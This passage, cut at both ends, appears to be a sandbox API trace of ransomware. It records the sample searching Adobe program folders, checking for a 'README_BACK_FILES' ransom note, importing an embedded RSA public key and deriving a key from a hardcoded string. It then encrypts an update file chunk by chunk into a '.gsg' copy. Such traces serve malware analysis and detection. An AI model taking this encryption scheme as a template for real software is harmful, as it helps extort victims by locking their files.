lpFindFileData=0x2b9edc4) returned 1 [0231.872] FindNextFileA (in: hFindFile=0x27174a8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0231.873] FindNextFileA (in: hFindFile=0x27174a8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0231.873] FindClose (in: hFindFile=0x27174a8 | out: hFindFile=0x27174a8) returned 1 [0231.873] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.009.20058\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.009.20058\\readme_back_files.htm")) returned 0x20 [0231.873] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0231.874] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x27170a8 [0231.876] FindNextFileA (in: hFindFile=0x27170a8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0231.876] FindNextFileA (in: hFindFile=0x27170a8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0231.876] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0231.876] GetLastError () returned 0x12 [0231.876] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\AcroRdrDCUpd1800920044_incr.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.012.20098\\acrordrdcupd1800920044_incr.msp")) returned 0x80 [0231.877] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\AcroRdrDCUpd1800920044_incr.msp", dwFileAttributes=0x80) returned 1 [0231.877] CreateFileA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\AcroRdrDCUpd1800920044_incr.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.012.20098\\acrordrdcupd1800920044_incr.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d14 [0231.877] CreateFileA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\AcroRdrDCUpd1800920044_incr.msp.gsg" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.012.20098\\acrordrdcupd1800920044_incr.msp.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.878] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\AcroRdrDCUpd1800920044_incr.msp.gsg", dwFileAttributes=0x2) returned 0 [0231.878] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2792b28) returned 1 [0231.887] CryptCreateHash (in: hProv=0x2792b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0231.887] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.888] CryptHashData (hHash=0x2717468, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.888] CryptDeriveKey (in: hProv=0x2792b28, Algid=0x6610, hBaseData=0x2717468, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27172a8) returned 1 [0231.888] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.888] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0231.888] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2793430) returned 1 [0231.890] CryptImportPublicKeyInfo (in: hCryptProv=0x2793430, dwCertEncodingType=0x1, pInfo=0x2796208*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2796238*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2796240*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2717268) returned 1 [0231.890] CryptEncrypt (in: hKey=0x2717268, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0231.890] CryptEncrypt (in: hKey=0x2717268, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2792ff0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2792ff0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0231.890] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2792ff0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.891] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.894] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.894] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.895] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.896] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.896] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.896] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.896] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.896] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.896] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.897] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.897] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.897] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.897] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.897] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.897] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.897] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.897] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.897] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.897] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.897] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.897] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.897] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.897] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.897] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.897] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.897] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.897] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.897] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.897] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.898] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.898] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.898] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.898] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.898] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.898] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.898] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.898] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.898] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.898] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.898] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.898] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.898] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.898] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.898] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.898] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.898] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.898] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.898] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.898] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.899] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.899] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.899] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.899] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.899] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.899] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.899] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.899] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.899] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.899] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.899] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.899] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.899] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.899] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.899] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.899] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.899] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.899] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.899] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.900] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.900] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.900] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.900] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.900] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.900] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.900] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.900] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.900] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.900] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.902] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.902] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.903] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, 